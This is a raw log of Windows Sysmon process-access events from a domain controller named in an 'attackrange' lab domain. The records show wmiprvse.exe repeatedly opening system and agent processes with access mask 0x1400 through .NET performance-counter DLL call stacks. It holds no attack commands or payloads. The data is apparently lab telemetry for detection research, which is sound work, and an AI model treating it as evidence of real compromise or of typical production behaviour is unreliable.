13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 